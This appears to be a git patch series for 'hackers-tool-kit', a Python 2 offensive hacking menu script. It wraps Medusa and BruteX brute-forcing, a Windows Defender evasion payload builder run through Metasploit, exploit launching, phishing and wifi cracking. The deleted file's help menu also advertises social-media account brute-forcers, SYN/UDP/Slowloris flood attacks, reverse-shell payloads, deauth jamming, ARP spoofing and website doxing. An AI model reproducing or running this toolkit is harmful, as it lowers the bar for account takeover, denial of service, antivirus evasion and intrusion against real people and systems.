hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From b308656b0ec2a768a1454a12a5f6b007c47eae2d Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 7 Apr 2019 18:46:33 +0100 Subject: [PATCH 091/214] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 265f9da..da9c4a8 100644 --- a/README.md +++ b/README.md @@ -44,3 +44,5 @@ this is where i will try to put the most recent updates * updated exploits.txt and payloads.txt * added comments to code making it easier too read + +* added a option to start a server via apache From 848d86cdf9736dca39dae5d0cd3feac6e897d046 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 19 Apr 2019 16:36:34 +0100 Subject: [PATCH 092/214] Delete htk.py --- htk.py | 2506 -------------------------------------------------------- 1 file changed, 2506 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 13bf464..0000000 --- a/htk.py +++ /dev/null @@ -1,2506 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of 